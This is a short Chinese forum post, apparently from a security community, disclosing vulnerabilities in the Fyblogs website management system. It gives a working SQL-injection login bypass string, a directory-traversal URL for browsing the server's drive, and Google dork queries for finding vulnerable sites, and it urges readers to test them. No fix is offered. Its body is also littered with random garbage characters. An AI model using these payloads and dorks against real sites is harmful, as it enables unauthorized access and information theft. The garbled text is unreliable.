找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2068|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-7 13:07:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: 未授权访问/权限绕过
# @: I$ o. Z. d3 j* K0 i7 n  b6 S) O# g! v. Q, D4 C
简要描述:. _- g; M( J$ m2 d! T

; D. F, t7 F6 Z3 Z3 H) JFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 @. r( X& Y1 {/ w1 N/ T' A: t0 @# d1 Z8 p9 J  K/ P& t+ `
详细说明:  S4 `' Q9 P5 O( p0 [$ j' P

0 L; W( i) o9 R+ g4 `3 F后台万能密码 'or'='or'
. A' @0 J) J2 v7 l0 N后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( m" e& Z" H3 e( K3 M; x' uadmin/uploadfile.asp?currentFolder=/upfiles/../1 x4 X8 a6 a! M3 E" s* Z$ f

; J8 K) `( X, T; y1 O. E漏洞证明:
/ _' v( p( j5 G* o9 @" J
8 b( ?& w6 O# ]$ i' Q" Q+ }谷歌:inurl:type.asp?id=1 新闻中心8 Y" v& @  ^, F  W: ^  J; u) Y) m
或者 :inurl:download_ok.asp?4 d% g" ~' g& d& [; a* j! f
3 n: T6 z$ d# \7 D' y
可以测试
* U2 u/ ^# S' u- v4 P+ e( [  ~- n) G% z9 q

. p! v6 T, Y# A2 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表